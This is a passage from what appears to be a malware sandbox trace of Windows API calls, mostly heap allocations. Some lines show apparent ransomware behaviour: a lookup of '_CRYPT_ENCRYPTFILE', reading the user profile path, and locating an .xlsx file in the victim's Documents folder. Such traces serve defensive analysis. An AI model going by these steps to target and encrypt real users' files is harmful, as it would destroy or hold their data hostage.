returned 0x2e54e78 [0264.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0264.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x22) returned 0x9779f8 [0264.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0264.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kw9ZLIvDnQk.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w9ZLIvDnQk.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9ZLIvDnQk.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZLIvDnQk.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIvDnQk.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IvDnQk.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vDnQk.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DnQk.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nQk.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qk.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0264.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0264.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0264.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0264.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0264.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0264.621] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0264.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0264.621] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0264.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0264.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0264.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0264.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0264.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0264.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0264.622] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0264.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0264.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0264.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0264.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0264.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0264.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0264.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0264.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0264.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0264.624] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0264.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0264.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0264.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0264.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0264.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0264.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0264.625] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0264.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0264.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0264.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0264.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0264.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.626] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0264.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.626] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0264.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0264.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0264.627] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/kw9ZLIvDnQk.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6df6a0, ftCreationTime.dwHighDateTime=0x1d5abfb, ftLastAccessTime.dwLowDateTime=0xd7dbe6f0, ftLastAccessTime.dwHighDateTime=0x1d588ec, ftLastWriteTime.dwLowDateTime=0xd7dbe6f0, ftLastWriteTime.dwHighDateTime=0x1d588ec, nFileSizeHigh=0x0, nFileSizeLow=0xa81, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="kw9ZLIvDnQk.xlsx", cAlternateFileName="KW9ZLI~1.XLS")) returned 0xa874d0 [0264.627] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0264.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0264.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0264.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0264.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 